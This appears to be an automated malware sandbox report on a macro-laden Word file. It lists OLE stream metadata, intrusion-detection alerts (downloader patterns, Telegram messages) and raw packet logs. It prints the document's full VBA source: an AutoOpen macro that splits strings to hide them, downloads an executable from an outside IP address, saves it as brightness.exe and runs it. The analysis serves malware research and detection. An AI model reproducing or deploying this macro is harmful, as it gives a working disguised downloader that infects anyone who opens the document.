                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                          Company:
                                                                                                                                          Contains Dirty Links:False
                                                                                                                                          Shared Document:False
                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                          Application Version:983040
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/ThisDocument
                                                                                                                                          VBA File Name:ThisDocument.cls
                                                                                                                                          Stream Size:4808
                                                                                                                                          Data ASCII:. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i
                                                                                                                                          Data Raw:01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 ac 11 04 75 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Attribute VB_Name = "ThisDocument"
                                                                                                                                          Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                          Attribute VB_TemplateDerived = True
                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                          Sub AutoOpen()
                                                                                                                                           
                                                                                                                                          Dim xHttp:
                                                                                                                                          'this is a comment
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
                                                                                                                                          'this is a comment
                                                                                                                                          Dim bStrm:
                                                                                                                                          'this is a comment
                                                                                                                                          Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          Dim nirm1
                                                                                                                                          nirm1 = "h"
                                                                                                                                          Dim nirm2
                                                                                                                                          nirm2 = "t"
                                                                                                                                          Dim nirm3
                                                                                                                                          nirm3 = "t" & "p:/" & "/147.124.216.113/image"
                                                                                                                                          Dim nirm4
                                                                                                                                          nirm4 = "."
                                                                                                                                          Dim nirm5
                                                                                                                                          nirm5 = "e"
                                                                                                                                          Dim nirm6
                                                                                                                                          nirm6 = "x"
                                                                                                                                          Dim nirm7
                                                                                                                                          nirm7 = "e"
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          Dim plpl
                                                                                                                                          plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
                                                                                                                                          
                                                                                                                                          'this is a comment
                                                                                                                                          xHttp.Open "GET", plpl, False
                                                                                                                                          xHttp.Send
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                           
                                                                                                                                          With bStrm
                                                                                                                                           .Type = 1
                                                                                                                                          .Open
                                                                                                                                           .write xHttp.responsebody
                                                                                                                                           
                                                                                                                                           'this is a comment
                                                                                                                                           
                                                                                                                                          Dim monu1
                                                                                                                                           monu1 = "brightness"
                                                                                                                                           Dim monu2
                                                                                                                                           monu2 = "."
                                                                                                                                           'this is a comment
                                                                                                                                           Dim monu3
                                                                                                                                           monu3 = "e"
                                                                                                                                           'this is a comment
                                                                                                                                           Dim monu4
                                                                                                                                           monu4 = "x"
                                                                                                                                           'this is a comment
                                                                                                                                           Dim monu5
                                                                                                                                           monu5 = "e"
                                                                                                                                           'this is a comment
                                                                                                                                           Dim monu6
                                                                                                                                           monu6 = monu1 & monu2 & monu3 & monu4 & monu5
                                                                                                                                           
                                                                                                                                           
                                                                                                                                           .savetofile monu6, 2
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          Dim parveen1
                                                                                                                                          Dim parveen2
                                                                                                                                          Dim parveen3
                                                                                                                                          Dim parveen4
                                                                                                                                          Dim praveen1
                                                                                                                                          praveen1 = """brightness"
                                                                                                                                          Dim praveen2
                                                                                                                                          praveen2 = "."
                                                                                                                                          'this is a comment
                                                                                                                                          Dim praveen3
                                                                                                                                          praveen3 = "e"
                                                                                                                                          'this is a comment
                                                                                                                                          Dim praveen4
                                                                                                                                          praveen4 = "x"
                                                                                                                                          'this is a comment
                                                                                                                                          Dim praveen5
                                                                                                                                          praveen5 = "e"""
                                                                                                                                          'this is a comment
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          Dim praveen6
                                                                                                                                          praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
                                                                                                                                           
                                                                                                                                          
                                                                                                                                          
                                                                                                                                          End With
                                                                                                                                           
                                                                                                                                          Shell (praveen6)
                                                                                                                                           
                                                                                                                                          End Sub
                                                                                                                                          

                                                                                                                                          General
                                                                                                                                          Stream Path:\x1CompObj
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:114
                                                                                                                                          Entropy:4.235956365095031
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          General
                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4096
                                                                                                                                          Entropy:0.248545188854887
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          General
                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4096
                                                                                                                                          Entropy:0.4819396898767131
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          General
                                                                                                                                          Stream Path:1Table
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:7882
                                                                                                                                          Entropy:5.884070235642364
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          General
                                                                                                                                          Stream Path:Data
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4618
                                                                                                                                          Entropy:4.726776485086767
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/PROJECT
                                                                                                                                          CLSID:
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Stream Size:370
                                                                                                                                          Entropy:5.26543622504816
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/PROJECTwm
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:41
                                                                                                                                          Entropy:3.0773844850752607
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:2910
                                                                                                                                          Entropy:4.3567255409849235
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/dir
                                                                                                                                          CLSID:
                                                                                                                                          File Type:VAX-order 68k Blit mpx/mux executable
                                                                                                                                          Stream Size:522
                                                                                                                                          Entropy:6.272080735145925
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          General
                                                                                                                                          Stream Path:WordDocument
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:17972
                                                                                                                                          Entropy:4.46180646482636
                                                                                                                                          Base64 Encoded:True
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T07:54:12.243144+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49723 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:14.133786+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49723 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:14.591406+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:15.515041+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49731 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:15.975264+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49733 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:16.930648+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49736 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:18.508728+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 53584 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:22.115322+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 53612 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:23.507981+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 53624 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:23.990983+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 53623 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:25.170046+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 53623 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:25.736960+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 53644 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:25.816325+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 53643 | 149.154.167.220 | 443 | TCP
2025-01-06T07:54:26.967936+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 53650 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:28.402962+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 53662 | 132.226.8.169 | 80 | TCP
                                                                                                                                          2025-01-06T07:54:29.896406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553671132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:31.399524+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553681132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:31.412893+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553683132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:32.647270+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553694132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:32.866022+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553681132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:33.415581+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553705188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:33.990289+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553709132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:34.256624+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553711132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:34.638891+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553716188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:35.694139+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553724132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:36.240323+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553731188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:36.927393+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.553734149.154.167.220443TCP
                                                                                                                                          2025-01-06T07:54:37.084764+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553738132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:44.379776+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.553795149.154.167.220443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                          Jan 6, 2025 07:54:02.800092936 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800106049 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800138950 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800141096 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.800187111 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.800501108 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800513029 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800527096 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800539017 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800559044 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.800606012 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.800791979 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800803900 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800815105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800826073 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800837040 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.800848007 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.800848007 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.801218033 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801229954 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801240921 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801258087 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801273108 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801285028 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801296949 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801306009 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.801341057 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.801341057 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.801377058 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801397085 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801408052 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.801438093 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.802030087 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.802041054 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.802104950 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.838618994 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838677883 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838690042 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838696003 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.838702917 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838727951 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.838767052 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838838100 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838850021 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838857889 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.838860989 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838872910 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.838886023 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.838943958 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839160919 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839205980 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839216948 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839227915 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839250088 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839251041 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839278936 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839303017 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839319944 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839330912 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839345932 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839405060 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839761019 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839777946 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839852095 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839863062 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839873075 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.839885950 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.839912891 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840157032 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840176105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840200901 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840212107 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840238094 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840240955 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840253115 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840270996 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840307951 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840313911 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840322018 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840333939 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840375900 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840384007 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840384007 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.840424061 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.840475082 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.841078043 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841099024 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841149092 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.841159105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841171026 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841190100 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841207027 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841213942 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.841217995 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841269970 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.841291904 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841310024 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841320992 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841331959 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.841347933 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.841381073 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.842014074 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842035055 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842046022 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842071056 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.842088938 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842097044 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.842101097 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842118979 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.842148066 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.882276058 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.882289886 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.882301092 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.882364035 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.882443905 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.886653900 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886665106 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886682034 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886693954 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886704922 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886713982 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.886719942 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886773109 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.886821032 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.886867046 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886879921 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886888981 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.886926889 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.886997938 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.887038946 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.887051105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.887063980 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.887089014 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.887100935 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.887101889 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.887157917 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974033117 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974035025 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974075079 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974107981 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974121094 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974131107 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974143028 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974169016 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974169016 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974351883 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974368095 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974380016 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974427938 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974427938 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974469900 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974482059 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974493027 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974502087 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974534035 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974559069 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974668980 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974680901 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974692106 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974703074 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974720001 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974730015 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974730968 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974741936 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974754095 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974783897 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974818945 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974832058 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974842072 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974852085 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974863052 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974864960 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.974874020 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974886894 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.974898100 CET8049710147.124.216.113192.168.2.5
